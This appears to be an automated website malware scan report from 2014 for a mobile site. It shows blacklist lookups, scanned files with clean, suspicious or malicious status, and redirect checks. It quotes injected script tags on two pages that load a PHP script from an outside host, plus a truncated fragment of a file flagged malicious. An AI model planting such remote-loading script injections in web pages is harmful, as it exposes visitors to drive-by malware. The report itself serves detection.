Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trianonborgopio.mobi
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trianonborgopio.mobi/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://trianonborgopio.mobi/ | 200 OK Content-Length: 3271 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.min.js | 200 OK Content-Length: 81760 Content-Type: application/x-javascript | clean |
http://code.jquery.com/mobile/1.3.1/jquery.mobile-1.3.1.min.js | 200 OK Content-Length: 42340 Content-Type: application/x-javascript | clean |
http://trianonborgopio.mobi/lib/klass.min.js | 200 OK Content-Length: 1198 Content-Type: application/javascript | clean |
http://trianonborgopio.mobi/code.photoswipe.jquery-2.0.3.min.js | 200 OK Content-Length: 66130 Content-Type: application/javascript | clean |
http://trianonborgopio.mobi/index_en.html | 200 OK Content-Length: 9645 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.6.4.min.js | 200 OK Content-Length: 54020 Content-Type: application/x-javascript | clean |
http://trianonborgopio.mobi/code.photoswipe.jquery-3.0.5.min.js | 200 OK Content-Length: 77126 Content-Type: application/javascript | clean |
http://trianonborgopio.mobi/rss/news.html | 200 OK Content-Length: 952 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.alessiosatta.it/img/6QeiNof2.php?id=23004842" type="text/javascript"></script> | ||
http://code.jquery.com/jquery-1.4.4.min.js | 200 OK Content-Length: 51100 Content-Type: application/x-javascript | clean |
http://code.jquery.com/mobile/1.0a2/jquery.mobile-1.0a2.min.js | 200 OK Content-Length: 44653 Content-Type: application/x-javascript | clean |
http://trianonborgopio.mobi/rss/index.js | 200 OK Content-Length: 10235 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var maxLength = 20; document.write( '<div data-role="page" id="list">' ' <div data-role="header" data-position="fixed">' ' <a href="#" onclick="javascript:history.go(-1);">Back</a> ' ' <h1><span id="widgetTitle">Loading...</span> ' ' <span style="font-size: x-small"></span></h1>' ' </div>' ' <div data-role="content">' ' <ul data-role="listvie Antivirus reports:
| ||
http://trianonborgopio.mobi/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://trianonborgopio.mobi/map.html | 200 OK Content-Length: 1639 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.alessiosatta.it/img/6QeiNof2.php?id=23004820" type="text/javascript"></script> | ||
http://trianonborgopio.mobi/lib/jquery-1.6.2.min.js | 200 OK Content-Length: 91573 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trianonborgopio.mobi
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 03:59:47 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 3271
Content-Type: text/html
Last-Modified: Tue, 04 Feb 2014 19:43:50 GMT
...3271 bytes of data.
GET / HTTP/1.1
Host: trianonborgopio.mobi
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 03:59:47 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 3271
Content-Type: text/html
Last-Modified: Tue, 04 Feb 2014 19:43:50 GMT
...3271 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trianonborgopio.mobi
Referer: http://www.google.com/search?q=trianonborgopio.mobi
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trianonborgopio.mobi
Referer: http://www.google.com/search?q=trianonborgopio.mobi
Result:
The result is similar to the first query. There are no suspicious redirects found.